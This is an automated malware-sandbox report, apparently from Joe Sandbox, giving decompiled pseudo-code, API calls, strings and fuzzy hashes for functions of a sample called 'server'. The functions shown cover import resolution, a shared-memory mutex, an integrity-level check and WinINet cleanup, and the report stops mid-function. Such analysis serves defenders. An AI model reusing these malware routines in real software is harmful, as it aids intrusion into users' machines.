_allmul.NTDLL(00000000,FF676980,000000FF), ref: 047E6863
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 047E6883
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,047E26E9,?), ref: 047E689E
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000), ref: 047E6945
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000,?,?), ref: 047E6955
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 047E698F
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 047E69A9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047E69B5

Part of subcall function 047E5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05429218,00000000,?,746AF710,00000000,746AF730), ref: 047E52A0
Part of subcall function 047E5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05429160,?,00000000,30314549,00000014,004F0053,05429270), ref: 047E533D
Part of subcall function 047E5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047E68B6), ref: 047E534F

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000,?,?), ref: 047E69C8

Strings

@MetNet, xrefs: 047E69C8
Uet, xrefs: 047E6945

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uet$@MetNet
API String ID: 3521023985-1616585941
Opcode ID: 809c7e53faea5715972e870fa5611abc6c0f47efa7b1ffe437aefd15622003b2
Instruction ID: b76c1fb2a227ab3a9b861077995a14dc9bdaa664c1dcdeb609bf56433341c7d2
Opcode Fuzzy Hash: 809c7e53faea5715972e870fa5611abc6c0f47efa7b1ffe437aefd15622003b2
Instruction Fuzzy Hash: 5F517DB1508310AFD711AF12CC449ABBBECEB8C324F808B1EF5A5D6290D734A944CF92

Uniqueness

Uniqueness Score: -1.00%

Function 047E7FC5 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E047E7FC5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x47e0000;
				_t115 = _t139[3] + 0x47e0000;
				_t131 = _t139[4] + 0x47e0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x47e0000;
				_v16 = _t139[5] + 0x47e0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x47e0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x47ea1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x47ea1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x47ea1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x47ea1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x47ea1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x47ea1b8; // 0x0
										 *_t102 = _t125;
										 *0x47ea1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x47ea1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x047e7fd4
0x047e7fea
0x047e7ff0
0x047e7ff2
0x047e7ff7
0x047e7ffd
0x047e8002
0x047e8005
0x047e8013
0x047e801a
0x047e801d
0x047e8020
0x047e8021
0x047e8024
0x047e8027
0x047e802a
0x047e802f
0x047e803e
0x00000000
0x047e8044
0x047e804e
0x047e8058
0x047e805d
0x047e805f
0x047e8069
0x047e806c
0x047e806f
0x047e8075
0x047e8077
0x047e8077
0x047e807a
0x047e807d
0x047e8082
0x047e8086
0x047e8099
0x047e809b
0x047e8143
0x047e8143
0x047e814a
0x047e814d
0x047e8157
0x047e8157
0x047e815b
0x047e81d9
0x047e81dc
0x047e81de
0x047e81de
0x047e81e5
0x047e81e7
0x047e81f1
0x047e81f4
0x047e81f7
0x047e81f7
0x00000000
0x047e815d
0x047e8160
0x047e818e
0x047e8198
0x047e819c
0x047e81a4
0x047e81a7
0x047e81ae
0x047e81b8
0x047e81b8
0x047e81bc
0x047e81c1
0x047e81d0
0x047e81d6
0x047e81d6
0x047e81bc
0x00000000
0x047e8167
0x047e816a
0x047e8172
0x047e8187
0x047e818c
0x00000000
0x00000000
0x047e818c
0x00000000
0x047e8172
0x047e8160
0x047e815b
0x047e80a1
0x047e80a8
0x047e80b8
0x047e80bb
0x047e80c1
0x047e80c5
0x047e8108
0x047e8114
0x047e813d
0x047e8116
0x047e811a
0x047e8120
0x047e8128
0x047e812a
0x047e812d
0x047e8133
0x047e8135
0x047e8135
0x047e8128
0x047e811a
0x00000000
0x047e8114
0x047e80cd
0x047e80d0
0x047e80d7
0x047e80e7
0x047e80ea
0x047e80fa
0x00000000
0x047e8100
0x047e80e1
0x047e80e5
0x00000000
0x00000000
0x00000000
0x047e80e5
0x047e80b2
0x047e80b6
0x00000000
0x00000000
0x00000000
0x047e80b6
0x047e808f
0x047e8093
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 047E803E
LoadLibraryA.KERNELBASE(?), ref: 047E80BB
GetLastError.KERNEL32 ref: 047E80C7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 047E80FA

Strings

@MetNet, xrefs: 047E80C7, 047E819E
$, xrefs: 047E8013

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$@MetNet
API String ID: 948315288-3365357938
Opcode ID: 9433d81cc4246991f5e232cb84ade57372a3e26709f4da75feeab7ea6ffd3690
Instruction ID: 99e27ecaa453245e2f1b66061341b72ab893e12edb4d3351adbcd5ee65d53a59
Opcode Fuzzy Hash: 9433d81cc4246991f5e232cb84ade57372a3e26709f4da75feeab7ea6ffd3690
Instruction Fuzzy Hash: B98109B1A00605AFDB10DF9AD884BAAB7F5FB4C310F15862DE905EB340E775EA05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00414000 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 188
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(02B53AE0,02B53FFC,00000040), ref: 0041447C

Strings

Jb%, xrefs: 00414248
IVE, xrefs: 00414292
0P%G, xrefs: 0041431E
oQZ, xrefs: 004143B5
V%7(, xrefs: 004143CF
%b5;, xrefs: 0041433B
mn@, xrefs: 00414120
kiu, xrefs: 004142E4
Jo , xrefs: 0041422B

Memory Dump Source

Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f000_server.jbxd

Similarity

API ID: ProtectVirtual
String ID: %b5;$0P%G$IVE$Jb%$Jo $V%7($mn@$oQZ$kiu
API String ID: 544645111-1792616812
Opcode ID: 3a72a6586edd0f9ec55298982242bba0f0d13a2d0595b106cf83eff69309ef5f
Instruction ID: 72e014972078c534ab087c231bb10598d054eb390f010d6b2350a8619cf21a67
Opcode Fuzzy Hash: 3a72a6586edd0f9ec55298982242bba0f0d13a2d0595b106cf83eff69309ef5f
Instruction Fuzzy Hash: C6B1FBB56093809FC254CF6AD18960AFBF0FB94744F94990CB9A59B620D3B4C985CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 047E415A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E047E415A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L047E82D4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x47ea348; // 0xc3d5a8
				_t5 = _t13 + 0x47eb7b4; // 0x5428d5c
				_t6 = _t13 + 0x47eb644; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L047E7F3A();
				_t17 = CreateFileMappingW(0xffffffff, 0x47ea34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x047e415a
0x047e4162
0x047e4166
0x047e416c
0x047e4171
0x047e4176
0x047e4179
0x047e417c
0x047e4181
0x047e4182
0x047e4185
0x047e418a
0x047e4191
0x047e419b
0x047e419d
0x047e419e
0x047e41a1
0x047e41bd
0x047e41c3
0x047e41c7
0x047e4215
0x047e41c9
0x047e41d6
0x047e41e6
0x047e41ee
0x047e4200
0x047e4204
0x00000000
0x00000000
0x047e41f0
0x047e41f3
0x047e41f8
0x047e41fa
0x047e41fa
0x047e41d8
0x047e41da
0x047e4206
0x047e4207
0x047e4207
0x047e41d6
0x047e421c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?,?), ref: 047E4166
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047E417C
_snwprintf.NTDLL ref: 047E41A1
CreateFileMappingW.KERNELBASE(000000FF,047EA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 047E41BD
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?), ref: 047E41CF
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 047E41E6
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53), ref: 047E4207
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?), ref: 047E420F

Strings

@MetNet, xrefs: 047E420F

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MetNet
API String ID: 1814172918-2109406137
Opcode ID: 722e6e4dac43c6dd5255933829ba9ebfb9a2127de39d544b1ad15342a309bfcb
Instruction ID: 5103fd7b6b5ab0f2ccf0a40c747d932e76e30136e016dd97ba84d0476d6123d0
Opcode Fuzzy Hash: 722e6e4dac43c6dd5255933829ba9ebfb9a2127de39d544b1ad15342a309bfcb
Instruction Fuzzy Hash: E12193F2640214BBDB21EB6ACD05FEE37B9EB8C754F114221F605EB391D674A9058B50

Uniqueness

Uniqueness Score: -1.00%

Function 047E4BE7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E047E4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E047E16B2(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E047E61DA(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E047E61DA(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E047E61DA(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E047E61DA(_t46);
				}
				return _t24;
			}

0x047e4be7
0x047e4be7
0x047e4be9
0x047e4beb
0x047e4bf2
0x047e4bf9
0x047e4bf9
0x047e4bfe
0x047e4c01
0x047e4c08
0x047e4c11
0x047e4c15
0x047e4c1a
0x047e4c1a
0x047e4c1c
0x047e4c21
0x047e4c25
0x047e4c2a
0x047e4c2a
0x047e4c2c
0x047e4c31
0x047e4c35
0x047e4c3a
0x047e4c3a
0x047e4c3c
0x047e4c47
0x047e4c4a
0x047e4c4a
0x047e4c4c
0x047e4c51
0x047e4c54
0x047e4c54
0x047e4c56
0x047e4c5d
0x047e4c60
0x047e4c65
0x047e4c68
0x047e4c68
0x047e4c6b
0x047e4c70
0x047e4c73
0x047e4c73
0x047e4c78
0x047e4c7c
0x047e4c7f
0x047e4c7f
0x047e4c84
0x047e4c89
0x00000000
0x047e4c8c
0x047e4c93

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C15
InternetCloseHandle.WININET(?), ref: 047E4C1A
InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C25
InternetCloseHandle.WININET(?), ref: 047E4C2A
InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C35
InternetCloseHandle.WININET(?), ref: 047E4C3A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,047E2248,?,?,746981D0,00000000,00000000), ref: 047E4C4A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,047E2248,?,?,746981D0,00000000,00000000), ref: 047E4C54

Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
String ID:
API String ID: 2824497044-0
Opcode ID: 9ae7b02872d9694f67d267cca4a0755ea34ea4007c3d2e85172f11deea8ddbab
Instruction ID: e99ffac1e5312078c1b682185444f61799486066c413dfbbd76752e274aad0b3
Opcode Fuzzy Hash: 9ae7b02872d9694f67d267cca4a0755ea34ea4007c3d2e85172f11deea8ddbab
Instruction Fuzzy Hash: 63113D766006586BC530AEABED84C6BB7FDEB4C2053954F18E185D3721C735F8498A60

Uniqueness

Uniqueness Score: -1.00%

Function 047E5E40 Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E047E5E40(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x47ea2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E047E33DC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E047E61DA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x047e5e4d
0x047e5e54
0x047e5e5b
0x047e5e6f
0x047e5e7a
0x047e5e92
0x047e5e9f
0x047e5ea2
0x047e5ea7
0x047e5eb2
0x047e5eb6
0x047e5ec5
0x047e5ec9
0x047e5ee5
0x047e5ee5
0x047e5ee9
0x047e5ee9
0x047e5eee
0x047e5ef2
0x047e5ef8
0x047e5ef9
0x047e5f00
0x047e5f06

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 047E5E72
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 047E5E92
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 047E5EA2
CloseHandle.KERNEL32(00000000), ref: 047E5EF2

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 047E5EC5
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047E5ECD
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047E5EDD

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 61b025d65b0d01cdbcde7d141817d5fb1aeb9c5b370857cbf8703fd03d440c9d
Instruction ID: e59fff6adece1b6cde69a14ee546e0b74cd1c31c03491ea25d405247f83c0b53
Opcode Fuzzy Hash: 61b025d65b0d01cdbcde7d141817d5fb1aeb9c5b370857cbf8703fd03d440c9d
Instruction Fuzzy Hash: C221597590020DFFEB00DFA2CC84EFEBBB9EB48304F0041A5EA10AA251DB759E54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 047E6675 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E047E6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x47ea348; // 0xc3d5a8
				_t1 = _t9 + 0x47eb516; // 0x253d7325
				_t36 = 0;
				_t28 = E047E5815(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5429601
					_t40 = E047E33DC(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E047E5063(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E047E61DA(_t40);
						_t42 = E047E4AC7(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E047E61DA(_t36);
							_t36 = _t42;
						}
						_t43 = E047E2708(_t36, _t33);
						if(_t43 != 0) {
							E047E61DA(_t36);
							_t36 = _t43;
						}
					}
					E047E61DA(_t28);
				}
				return _t36;
			}

0x047e6675
0x047e6678
0x047e6679
0x047e6680
0x047e6687
0x047e668e
0x047e6692
0x047e6699
0x047e66a0
0x047e66a5
0x047e66ad
0x047e66b7
0x047e66bb
0x047e66bf
0x047e66c5
0x047e66ca
0x047e66d4
0x047e66da
0x047e66dc
0x047e66f3
0x047e66f7
0x047e66fa
0x047e66ff
0x047e66ff
0x047e6708
0x047e670c
0x047e670f
0x047e6714
0x047e6714
0x047e670c
0x047e6717
0x047e671c
0x047e6722

APIs

Part of subcall function 047E5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047E668E,253D7325,00000000,00000000,?,76B5C740,047E3ECE), ref: 047E587C
Part of subcall function 047E5815: sprintf.NTDLL ref: 047E589D

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

strcpy.NTDLL ref: 047E66BF
lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA

Part of subcall function 047E5063: lstrlen.KERNEL32(00000000,00000000,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E5074

Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7

Part of subcall function 047E4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,047E66F3,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E4AD1
Part of subcall function 047E4AC7: _snprintf.NTDLL ref: 047E4B2F

Strings

=, xrefs: 047E66E1

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 2780cfda5bb4b84562d1ff819eeb3ac3de882719a9bf36f24c729198378e4270
Instruction ID: 40384eef5541a5d43349ddac50447f29ccbf796c618402297544cc557e7f7b93
Opcode Fuzzy Hash: 2780cfda5bb4b84562d1ff819eeb3ac3de882719a9bf36f24c729198378e4270
Instruction Fuzzy Hash: 6411A373901129779612BBBADC88CBE37AD9E5D6683454316FA04AB302DE79FD0247A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401202 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004012E6(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
